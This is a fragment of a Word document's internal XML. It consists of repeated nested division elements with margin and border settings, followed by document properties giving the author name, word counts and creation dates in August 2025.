                <w:div w:id="1767727826">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="133438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449805">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="386301605">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="605625367">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="529489045">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="296448232">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="86070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832639">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="309293347">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="584800793">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1927104683">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="379863601">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="779837887">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="136748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702908">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="724333584">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1228301200">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1772116931">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1360660670">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="380174960">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="205307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442028">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1311906496">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="893731656">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1183591461">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="16347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274053">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1493712325">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="637607953">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="419452382">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1863128773">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="90321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305812">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="286400125">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="942491172">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="838235666">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1694763707">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="168593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930106">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="361592278">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="122966936">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1158106984">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="361788035">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="29480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298452">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1512909015">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1494444092">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="770323796">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="579798351">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="384641031">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1579755253">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="484665621">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="140595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15</Pages>
  <Words>2912</Words>
  <Characters>16602</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Swadhin Das</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Swadhin Das</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-07T02:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-07T05:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>